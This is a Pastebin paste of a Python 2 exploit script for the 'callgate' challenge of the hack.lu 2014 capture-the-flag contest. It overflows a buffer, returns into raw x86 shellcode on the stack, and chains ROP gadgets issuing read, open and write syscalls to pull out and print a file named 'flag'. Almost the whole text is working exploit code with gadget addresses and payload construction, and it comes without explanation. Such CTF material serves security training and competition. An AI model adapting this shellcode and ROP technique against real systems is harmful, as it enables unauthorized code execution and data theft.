Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/urs/bin/python2.7 -u
- #Exploit for "callgate" - hack.lu 2014
- #By nsr from tasteless - www.tasteless.se
- import struct, time
- addr = 0xffff7800
- sc = '\x89\xe5\xb8\xef\xbe\xad\xde\x89\x04\x24\xb8\x01\x00\x00\x00\x89\x45\x04\x31\xc0\x89\x45\x08\x89\xe8\x83\xe8\x24\x89\x45\x0c\xb8\x00\x02\x00\x00\x89\x45\x10\xb8\x10\x81\x04\x08\xff\xe0'
- print '#hello' #valid file on the server
- a = "A" * 116
- a += struct.pack('<I',0x080483a6) #best gadget ever: push esp ; jl 0x80483ab ; dec cl ; ret
- #since the jmp is not taken, eip will point to top of the stack which is under our control AND NX \o/
- a += sc
- print a
- time.sleep(1)
- ###read###
- b = struct.pack('<I',0x0804877d) #pop edi ; pop ebp ; ret
- b += struct.pack('<I',0x3) #will become eax
- b += struct.pack('<I',0xdeadbeef)
- b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
- b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
- b += struct.pack('<I',0x0700001a) #ret
- b += struct.pack('<I',0x0804877c) # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
- b += struct.pack('<I',0x00) #ebx
- b += struct.pack('<I',addr) #ecx
- b += struct.pack('<I',0x10) #edx
- ###open###
- b += struct.pack('<I',0x0804877d) #pop edi ; pop ebp ; ret
- b += struct.pack('<I',0x5) #eax
- b += struct.pack('<I',0xdeadbeef)
- b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
- b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
- b += struct.pack('<I',0x0700001a) #ret
- b += struct.pack('<I',0x0804877c) # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
- b += struct.pack('<I',addr) #ebx
- b += struct.pack('<I',0x2000) #ecx
- b += struct.pack('<I',10) #edx
- ###read###
- b += struct.pack('<I',0x0804877d) #pop edi ; pop ebp ; ret
- b += struct.pack('<I',0x3) #eax
- b += struct.pack('<I',0xdeadbeef)
- b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
- b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
- b += struct.pack('<I',0x0700001a) #ret
- b += struct.pack('<I',0x0804877c) # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
- b += struct.pack('<I',0x04) #ebx
- b += struct.pack('<I',addr) #ecx
- b += struct.pack('<I',0x50) #edx
- ###write###
- b += struct.pack('<I',0x0804877d) #pop edi ; pop ebp ; ret
- b += struct.pack('<I',0x4) #eax
- b += struct.pack('<I',0xdeadbeef)
- b += struct.pack('<I',0x08048143) #mov eax, edi ; ret
- b += struct.pack('<I',0x07000004) # advanced syscall with "register frame"
- b += struct.pack('<I',0x0700001a) #ret
- b += struct.pack('<I',0x0804877c) # pop ebx, pop edi ; pop ebp ; ret -> skip next 12 bytes
- b += struct.pack('<I',0x01) #ebx
- b += struct.pack('<I',addr) #ecx
- b += struct.pack('<I',0x50) #edx
- ###exit - There's got to be time for that###
- b += struct.pack('<I',0x080483B7)
- print b
- time.sleep(1)
- c = 'flag\x00'
- print c
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement